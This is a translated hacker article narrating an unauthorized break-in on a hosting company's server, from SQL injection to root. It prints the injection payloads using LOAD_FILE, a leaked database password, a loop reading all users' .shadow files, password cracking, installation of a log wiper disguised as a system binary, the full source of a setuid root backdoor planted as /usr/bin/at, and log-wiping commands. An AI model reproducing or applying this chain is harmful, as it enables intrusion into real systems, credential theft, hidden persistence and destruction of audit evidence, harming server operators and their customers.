From sql-injection to root by p-range Name : From sql-injection to root Author : p-range - AltST Date : 5.03.2007 Translation : NeMiNeM In this article I'm going to tell you about how I got root on one foreign hosting-server. [A Small Prehistory] As usual, in the evening, I was surfing on the Internet and came across an interesting web-site. It was a web-site of one foreign hosting service. Let's call it I've noticed that the engine was original and rather difficult. There were plenty of functions and scripts. And as always, as a matter of habit, I began to put different wrong values in script variable trying to get an error. [First Catch] The time has passed, I didn't find anything and decided to dig deeper. I started to look page sources. I've noticed such JavaScript Code in the main page source: Code: <script language='JavaScript' type='text/javascript'> function openWin(pid) { myWin = open("inc/photo.php?pid="+pid, "displayWindow", "width=40,height=30,status=no,toolbar=no,menubar=no "); } </script> I've paid attention to the string: "inc/photo.php?pid="+pid and hurried to move to url:' As I thought, the script gave MySQL error: Code: Fatal error: Call to undefined function: mysql_error() in /home/dhoster/public_html/inc/photo.php on line 29 Then I tried to find a correct database query. In the result I got such a string:,2,3,4,5/* Unfortunately, an attempt to find a table name failed. An idea to look through mysql.user table failed as well. Finally I decided to try to read /etc/passwd file through the function LOAD_FILE(). To my surprise, it worked out, and I saw users' logins on the page. As I've learned the full path to the web-site directory, I decided to find engine config file. I was lucky to find it at once. In the result I clicked such url:,2,LOAD_FILE('/home/dhoster/public_html/inc/config.php'),4,5/* and saw config.php file: PHP: <?php $dbhost = 'localhost'; $dbuser = 'dhoster'; $dbpass = 'gfGFd.uhL'; $dbname = 'engine'; ?> [Looking around the server] I hurried to log in SSH using this username and password. Strangely enough the password was correct I began to examine the system. Server was working under Linux. The core was rather new so I couldn't raise my rights using exploits. I began to thing what to do next. I looked through the directory contents of user dhoster, but I didn't find anything interesting, I mean at first I didn't. I paid attention to .shadow file, which was in the root of user's directory. Having executed cat .shadow command, I saw my user's ssh password hash. I supposed that such files were in the root directory of every user and decided to try to read them. But first I tried to find server's history files. In order to do this I executed such command: find / -type f -name *_history -ls Having looked through the results, I didn't find anything interesting, which would help me to raise my right. /home directory, where there were all web-sites of this hosting, was closed for reading. And suddenly a tremendous idea flashed across my mind. I remembered about an interesting feature, which helped to bypass the ban to read files from /home directory. [Privileges raising] for i in ls `cat /etc/passwd|awk -F ":" '{print $6}'`; do cat $i/.shadow; done|more Its aim is to read /etc/passwd file using cat utility, then with a help of awk to choose logins in cycle from it and to substitute as user/.shadow, then read it and display in paginal regime (done|more). Certainly, hackers can read not only .shadow but also .htaccess, index.php and finally includes/config.php and other files with somekind standard names. Then, as a result of files scanning by key-words, accounts go into strange hands. The only thing left to do is to find an appropriate application for script uploading. For example, if it's CMS, whose php-templates can be modified through WEB-interface and the executable scripts are allowed to upload something on the server, it's just a matter of technique to do the rest. I think the idea is clear. Having executed this command, I've got access to all .shadow files in /home directory. And there was /home/admin/.shadow file among them. I was lucky because I had rights to read those files. Having got admin's hash, I inserted it into JohnTheRipper. The password wasn't complicated. Having got it I logged in as admin. [Logwiper installation] Certainly, I needed to make sure that admin wouldn't determine who had been in his system. I decided to install logwiper "wipe". To my mind it's rather good as it can clean UTMP, WTMP, lastlogs and ACCT files. I downloaded archive with wipe ( and unpacked it into /home/admin/l/ directory. Then I ran an installation command: make linux. Having got wipe binary file, I copied it to /usr/bin/telnef. In order to not arouse suspicion, I deleted l/ folder. Logwiper was ready to use! [Consolidating in the system] Then I had a task to consolidate myself in the system. I didn't start to use public rootkits because the administrator would notice it during a first chrootkit check. I wrote a simple backdoor. Source code at.c Code: main() { setuid(0); setgid(0); system("/usr/bin/telnef l admin"); system("/usr/bin/telnef w admin"); system("/usr/bin/telnef u admin"); system("/usr/bin/telnef a admin"); system("/bin/bash"); } Having compiled it, I moved at binary file into usr/bin/at and put suid on it. Then I could get root privileges in the system from any user after /usr/bin/at executing What does it do? I think it's clear. The binary file gets root rights, then runs logwiper, which I've already installed and backdoors the system. [Wiping out tracks] The only thing to do is to wipe out my tracks of being in the system: [admin@server admin]# /usr/bin/telnef l admin Patching... Done. [admin@server admin]# /usr/bin/telnef w admin Patching... Done. [admin@server admin]# /usr/bin/telnef u admin Patching... Done. [admin@server admin]# /usr/bin/telnef a admin Patching... Done. [Conclusion] If your hosting administrators think that from other client's directory, where permission is "r-x--x--x", there is no possibility to read files, they are mistaken. If they think that the ban to read e.g. "/home" directory won't let you know the list of home folders, they don't know elementary things. That's all for today. PS: And what an innocent start it was... ____________________________ Original article: (с) p-range :: AltSTPS: Translation: NeMiNeM for Please, feel free to show and correct my mistakes in the translation. No flame please. Thank you.